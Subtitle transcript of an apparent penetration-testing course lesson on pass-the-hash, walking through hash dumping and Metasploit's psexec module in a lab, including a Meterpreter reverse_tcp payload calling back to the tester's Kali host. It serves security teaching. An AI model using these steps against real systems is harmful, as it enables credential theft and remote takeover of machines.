1 00:00:00,830 --> 00:00:08,630 Pass the hash is not a party game, nor is it a new attack. If you aren't new in this field, you've
2 00:00:08,630 --> 00:00:10,370 probably heard a lot about it.
3 00:00:11,970 --> 00:00:14,840 It's ancient history; in fact, it dates back to 1997.
4 00:00:16,330 --> 00:00:19,750 But it is still valid for the Windows operating system.
5 00:00:21,230 --> 00:00:25,880 Actually, it isn't like a classic vulnerability that I talked about earlier.
6 00:00:28,560 --> 00:00:33,600 What do you want me to say? It just helps you authenticate to a remote system with a hash.
7 00:00:34,700 --> 00:00:39,590 So when you use this method, you don't need to crack or decrypt the hash.
8 00:00:40,510 --> 00:00:46,900 I know what you're thinking. At first, it doesn't make sense that you can use a Windows hash for authentication
9 00:00:46,900 --> 00:00:47,410 remotely.
10 00:00:48,670 --> 00:00:52,780 So let me clarify what I'm saying here with an example.
11 00:00:53,910 --> 00:01:00,600 So let's assume that you've compromised a Windows machine by doing some fancy things and got a Meterpreter
12 00:01:00,600 --> 00:01:08,610 shell with system or administrative privileges, and naturally you're going to dump the SAM hashes
13 00:01:08,610 --> 00:01:10,140 by using hashdump.
14 00:01:11,310 --> 00:01:17,570 And I don't mean that you always gain access to a system through some exploits or by using Meterpreter.
15 00:01:18,570 --> 00:01:27,120 In fact, you may extract hashes with other methods like fgdump, pwdump or cachedump,
16 00:01:27,120 --> 00:01:27,450 et cetera.
17 00:01:28,460 --> 00:01:31,480 Whatever way you accomplish it is fine.
18 00:01:32,900 --> 00:01:37,430 I remember once I even detached the hard drive of a client's machine to get the hashes.
19 00:01:38,280 --> 00:01:41,240 OK, so now you have the username and hash pairs.
20 00:01:42,100 --> 00:01:43,990 So what is next?
21 00:01:45,510 --> 00:01:51,210 If you're lucky, but especially if you have the time, you may know how to use rainbow tables to crack
22 00:01:51,210 --> 00:01:51,660 the hash.
23 00:01:53,200 --> 00:02:00,430 That doesn't seem unreasonable necessarily, but as I said before, and you'll hear me say it again,
24 00:02:00,430 --> 00:02:04,690 in a penetration test, time is a very important factor.
25 00:02:05,950 --> 00:02:10,420 So at this point, let's talk about you and me, right, the human being.
26 00:02:11,320 --> 00:02:15,460 Now, there are lots and lots of digital platforms out there.
27 00:02:16,350 --> 00:02:24,840 And I don't know about you, there are all kinds of articles published about it, but lots of people
28 00:02:24,960 --> 00:02:34,200 use the exact same passwords for everything they have, everything they belong to, every device they
29 00:02:34,200 --> 00:02:34,490 own.
30 00:02:35,160 --> 00:02:35,670 So.
31 00:02:36,710 --> 00:02:41,570 Doesn't it make sense that they might share those credentials for their Windows authentication?
32 00:02:42,520 --> 00:02:45,190 Therefore, you don't need to crack the hash.
33 00:02:46,390 --> 00:02:52,180 And you will use it to check if the other targets on the network use the same hash and user pair.
34 00:02:53,460 --> 00:02:54,630 Isn't there a tool for this?
35 00:02:55,080 --> 00:03:05,880 Yes, there is a PsExec tool that's developed by Sysinternals, and this can check it for you, so you
36 00:03:05,880 --> 00:03:12,120 can use this tool to examine the network for which targets have the same user hash pair.
37 00:03:13,420 --> 00:03:20,950 It uses the Windows File and Print Sharing service, which operates over the SMB protocol, to authenticate
38 00:03:20,950 --> 00:03:23,410 to other target hosts in the network.
39 00:03:24,590 --> 00:03:27,920 However, I think I even have a better solution.
40 00:03:28,890 --> 00:03:37,910 MSF, your Swiss Army knife of hacking, if you will: you can use the MSF psexec module.
41 00:03:38,790 --> 00:03:45,060 Now, one secret here that I want you to realize is this module, which is more stable than the Sysinternals
42 00:03:45,060 --> 00:03:49,980 tool, also enables you to enter the password itself.
43 00:03:51,220 --> 00:03:59,500 So if you are able to obtain an NTLM password hash during your pen test, you can run the MSF psexec
44 00:03:59,590 --> 00:04:00,100 module.
45 00:04:01,170 --> 00:04:03,140 So let's use it and see how it works.
46 00:04:05,110 --> 00:04:06,880 So let's go back to the msfconsole.
47 00:04:08,040 --> 00:04:10,470 And let me choose the psexec module.
48 00:04:11,820 --> 00:04:13,020 Use exploit.
49 00:04:13,940 --> 00:04:14,540 Windows.
50 00:04:15,600 --> 00:04:16,410 SMB.
51 00:04:17,390 --> 00:04:18,500 psexec.
52 00:04:19,670 --> 00:04:21,370 Show me the options.
53 00:04:23,080 --> 00:04:32,080 All right, so now you must set some variables. Set RHOST to 10.10.2.12 for my Windows
54 00:04:32,080 --> 00:04:32,860 7 machine.
55 00:04:33,850 --> 00:04:35,140 Set RPORT to...
56 00:04:36,300 --> 00:04:38,490 All right, RPORT is already set.
57 00:04:40,120 --> 00:04:42,640 Set SMBUser to vagrant.
58 00:04:46,040 --> 00:04:48,860 Set SMBPass to vagrant again.
59 00:04:50,750 --> 00:04:59,210 OK, so you're allowed to use password hashes here, but you have cracked and got some clear text passwords
60 00:04:59,210 --> 00:04:59,840 too, right?
61 00:05:00,870 --> 00:05:06,030 So then set payload to windows/meterpreter/
62 00:05:07,650 --> 00:05:08,960 reverse_tcp.
63 00:05:10,690 --> 00:05:11,560 Set LHOST
64 00:05:12,860 --> 00:05:14,660 to your Kali IP address.
65 00:05:17,990 --> 00:05:21,620 Set LPORT to 4445.
66 00:05:22,780 --> 00:05:25,720 So let's check one more time, show the options.
67 00:05:26,860 --> 00:05:29,620 Yeah, I don't think I've missed anything, so let's exploit.
68 00:05:33,490 --> 00:05:40,960 So the module's quickly executed and the session is open. Look at the whoami on the target and bring
69 00:05:40,960 --> 00:05:42,520 the information about the target.
70 00:05:43,540 --> 00:05:46,240 And sure enough, we are on the Windows 7 machine.